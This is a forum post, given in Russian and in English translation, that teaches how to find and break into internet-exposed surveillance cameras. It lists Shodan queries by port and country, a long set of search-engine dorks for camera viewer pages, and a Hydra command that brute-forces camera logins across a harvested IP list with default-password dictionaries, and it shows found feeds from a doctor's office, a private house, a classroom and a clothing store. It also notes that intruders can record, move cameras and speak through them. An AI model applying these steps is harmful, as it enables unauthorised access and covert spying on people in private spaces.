Contact us in messengers or by phone.

whatsapp telegram viber phone email
+79214188555

How to find and “hack” surveillance cameras?

DronVR

Private access level
Joined
Jun 1, 2014
Messages
284
Reaction score
263
Points
63
How to find and “hack” surveillance cameras?

Good day. Today we’ll talk about protection and access to surveillance cameras. There are a lot of them and they are used for different purposes. As always, we will use the standard database, which will allow us to find such cameras and select passwords for them.

Theory
Most devices are not configured or updated after installation. Therefore, our target audience is under popular ports. 8000 , 8080 and 554 . If you need to scan the network, it is better to immediately select these ports.

Method number 1
For a good example, you can see interesting queries in the search engines Shodan and Sensys. Let's consider some illustrative examples with simple queries.
Code:
 has_screenshot: true port: 8000 // 183 results; 
 has_screenshot: true port: 8080 // 1025 results; 
 has_screenshot: true port: 554 // 694 results;
In such a simple way, you can access a large number of open cameras that are located in interesting places: shops, hospitals, gas stations, etc. Let's consider a few interesting options for clarity.
001.jpg

Doctor's appointment​

002.jpg

Private house, somewhere deep in Europe​
003.jpg

A class somewhere in Chelyabinsk​
004.jpg

Women's clothing store​

In this simple way, you can find a lot of interesting objects to which access is open. Do not forget that you can use the country filter to get country data.
Code:
 has_screenshot: true port: 8000 country: ru 
 has_screenshot: true port: 8080 country: ru 
 has_screenshot: true port: 554 country: ru

Method number 2
You can use the search for standard social networks. To do this, it is better to use page headers when viewing images from cameras, here is a selection of the most interesting options:

Code:
 inurl: /view.shtml 
 inurl: ViewerFrame? Mode = 
 inurl: ViewerFrame? Mode = Refresh 
 inurl: view / index.shtml 
 inurl: view / view.shtml 
 intitle: ”live view” 
 intitle: axis 
 intitle: liveapplet 
 all in title: ”Network Camera Network Camera” 
 intitle: axis intitle: ”video server” 
 intitle: liveapplet 
 inurl: LvAppl 
 intitle: ”EvoCam” 
 inurl: ”webcam.html” 
 intitle: ”Live NetSnap Cam-Server feed” 
 intitle: ”Live View / - AXIS 206M” 
 intitle: ”Live View / - AXIS 206W” 
 intitle: ”Live View / - AXIS 210 ″ 
 inurl: indexFrame.shtml Axis 
 intitle: start inurl: cgistart 
 intitle: ”WJ-NT104 Main Page” 
 intitle: snc-z20 inurl: home / 
 intitle: snc-cs3 inurl: home / 
 intitle: snc-rz30 inurl: home / 
 intitle: ”sony network camera snc-p1 ″ 
 intitle: ”sony network camera snc-m1 ″ 
 intitle: ”Toshiba Network Camera” user login 
 intitle: ”i-Catcher Console - Web Monitor”

005.jpg

We reap the benefits and find the airport
006.jpg

Company office
007.jpg

Add another port to the collection and you can complete
Method number 3

This method is the target. It is used when we have either one point and we need to find a password or we want to run the database using standard passwords and find valid results. Hydra is perfect for these purposes. To do this, you need to prepare a dictionary. You can go over and look for standard passwords for routers.


Let's look at a specific example. There is a camera model, DCS-2103. She is quite common. It works through port 80. Let's use the appropriate data and find the necessary information in shadan.

008.jpg


Next, we collect all the IP potential goals that are of interest to us. Next, we form a list. We collect a list of passwords and we will all use this using the hydra utility. To do this, we need to add a dictionary, IP list to the folder and execute the following command:
Code:
 hydra -l admin -P pass.txt -o good.txt -t 16 -vV -M targets.txt http-get


There should be a file in the root folder pass.txt with passwords, login we use one admin with the -l parameter, if you need to specify a dictionary for logins, then you need to add a file to the root directory and register it with the -L parameter. The selected results will be saved in a file good.txt . The list of IP addresses must be added to the root directory with the file targets.txt . The last phrase in the team http-get responsible for the connection through the port 80 .

009.jpg

Program operation example
010.jpg

Entering a team and getting started

In the end I want to add some information about the scan. To get the network numbers, you can use the excellent [DLMURL="https://4it.me/getlistip"] service. [/ DLMURL] Next, these networks need to be checked for the presence of the ports we need. I will not recommend scanners, but I’ll say that it’s worth moving towards such and similar scanners like masscan, vnc scanner and others. It can be written based on the well-known nmap utility. The main task is to scan the range and find active IPs with the necessary ports.

011.jpg


Conclusion
Remember that in addition to standard viewing, you can take more photos, record videos and download it yourself. You can also control the camera and rotate in the desired directions. And the most interesting thing is the ability to turn on sounds and talk on some cameras. What can I advise here? Set a reliable access password and be sure to forward ports.
 
Original message
Как найти и "взломать" камеры видеонаблюдения?

Доброго времени суток. Сегодня поговорим о защите и доступе к камерам видеонаблюдения. Их достаточно много и используются они для разных целей. Как всегда будем использоваться стандартную базу, которая позволит нам находить такие камеры и подбирать к ним пароли.

Теория
Большинство устройств после установки никто не настраивает или обновляет. Поэтому наша целевая аудитория находиться под популярными портам 8000, 8080 и 554. Если нужно провести сканирование сети, то лучше сразу выделять эти порты.

Способ№1
Для наглядного примера можно посмотреть интересные запросы в поисковиках Shodan и Сensys. Рассмотрим несколько наглядных примеров с простыми запросами.
Code:
has_screenshot:true port:8000 // 183 результата;
has_screenshot:true port:8080 // 1025 результатов;
has_screenshot:true port:554 // 694 результата;
Вот таким простым способом можно получить доступ к большому количеству открытых камер, которые размещены в интересных местах: магазинах, больницах, заправках и т.д. Рассмотрим для наглядности несколько интересных вариантов.
001.jpg

Приемная у врача​

002.jpg

Частный дом, где-то в глубине Европы​
003.jpg

Класс где-то в Челябинске​
004.jpg

Магазин женской одежды​

Таким простым способом можно найти достаточно много интересных объектов, к которым открыт доступ. Не забывайте, что можно применять фильтр country для получения данных по странам.
Code:
has_screenshot:true port:8000 country:ru
has_screenshot:true port:8080 country:ru
has_screenshot:true port:554 country:ru

Способ №2
Можно воспользоваться поиском стандартных социальных сетей. Для этого лучше использовать заголовки страниц при просмотре изображений с камер, вот такая подборка среди самых интересных вариантов:

Code:
inurl:/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:view/index.shtml
inurl:view/view.shtml
intitle:”live view”
intitle:axis
intitle:liveapplet
all in title :”Network Camera Network Camera”
intitle:axis intitle:”video server”
intitle:liveapplet
inurl:LvAppl
intitle:”EvoCam”
inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
intitle:”Toshiba Network Camera” user login
intitle:”i-Catcher Console - Web Monitor”

005.jpg

Пожинаем плоды и находим аэропорт
006.jpg

Офис компании
007.jpg

Добавим в коллекцию еще порт и можно завершать
Способ №3

Этот способ является целевым. Он применяется когда у нас есть либо одна точка и нужно подобрать пароль или мы хотим прогнать базу по стандартным паролям и найти валидные результаты. Для этих целей отлично подойдет Hydra. Для этого необходимо подготовить словар. Можно пробежаться и поискать стандартные пароли для роутеров.


Давайте рассмотрим на конкретном примере. Есть модель камеры, DCS-2103. Она достаточно часто встречается. Работает она через порт 80. Давайте воспользуемся соответствующими данными и найдем необходимую информацию в shadan.

008.jpg


Далее собираем все IP потенциальных целей, которые нам интересны. Далее формируем список. Собираем список паролей и будем все это использовать это с помощью утилиты hydra. Для этого нам необходимо добавить в папку словарь, список IP и выполнить вот такую команду:
Code:
hydra -l admin -P pass.txt -o good.txt -t 16 -vV -M targets.txt http-get


В корневой папке должен быть файл pass.txt с паролями, логин мы используем один admin с параметром -l, если нужно задать словарь для логинов, то необходимо добавит в корневую директорию файл и прописать его с параметром -L. Подобранные результаты будут сохраняться в файле good.txt. Список IP адресов нужно добавить в корневой каталог с файлом targets.txt. Последняя фраза в команде http-get отвечает за соединение через порт 80.

009.jpg

Пример работы программы
010.jpg

Ввод команды и начало работы

В конце хочу добавит немного информации о сканировании. Чтобы получить номера сетей можно воспользоваться отличным [DLMURL="https://4it.me/getlistip"]сервисом.[/DLMURL] Далее эти сетки нужно проверить на наличие необходимых нам портов. Сканеров рекомендовать не буду, но скажу что стоить двигать в сторону таких и подобных сканеров, как masscan, vnc scanner и другие. Можно написать на основе известной утилиты nmap. Главное задача - просканировать диапазон и найти активные IP с необходимыми портами.

011.jpg


Заключение
Помните, что помимо стандартного просмотра можно делать еще фото, записывать видео и скачивать его себе. Также можно управлять камерой и поворачивать в нужные направления. А самое интересное - это возможность включать звуки и говорить на некоторых камерах. Что можно тут посоветовать? Ставить надежный пароль доступа и обязательно перебрасывать порты.

До нового года осталось